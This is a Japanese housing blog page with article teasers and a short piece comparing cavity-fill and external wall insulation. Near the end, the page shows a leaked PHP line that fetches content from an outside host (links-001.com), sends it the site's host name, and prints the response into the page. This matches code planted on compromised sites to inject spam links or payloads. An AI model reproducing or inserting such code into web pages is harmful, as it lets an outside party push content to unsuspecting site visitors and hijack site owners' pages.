前へ
次へ

太陽光発電装置の設置は何月を元に計算するか

生活をするのに電気が欠かせないですが、通常は電力会社から電気の供給を受けて利用します。電力会社から安

more

不動産業者の選択の仕方は担当者です

賃貸マンションや賃貸アパートを借りる時、またはマイホームを購入するときには、不動産業者に相談して色々

more

不動産を売却する場合には色々と情報を集めた方が良い

土地や建物等の不動産を売却する場合には不動産会社に行って色々と相談する必要がありますが、今ではインタ

more

充填断熱工法と外張断熱工法の違い

住宅の基本として、雨風をしのげれば十分との考えがあります。確かにそれらが影響しなければ一定の生活ができます。ただ今はただ住めればいいだけでなくいかに住みやすいかもポイントになってきます。雨風をしのぐだけなら屋根と壁があればいいでしょうが、もっと快適に生活するためにいろいろな工夫をすることができそうです。昔の住宅は壁材として木材や土などを使っていました。隙間を埋めておけば水も風も防げます。ただ熱を防ぐのは難しく、外の暑さや寒さはそれなりに家の中に影響します。現代の住宅においては住宅の壁に断熱効果のある施工を行い、住宅内の温度を外部の影響から守る仕組みが取り入れられています。一般に行われるのは充填断熱工法です。コストも低めで効果も高くなりやすいためです。一方その他に取られるのが外張断熱工法です。こちらはコストが高くなりやすく、将来的にずれが生じやすいなどの問題もあります。建物によりどちらを取る方がいいか変わるので、検討して決めると良いでしょう。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top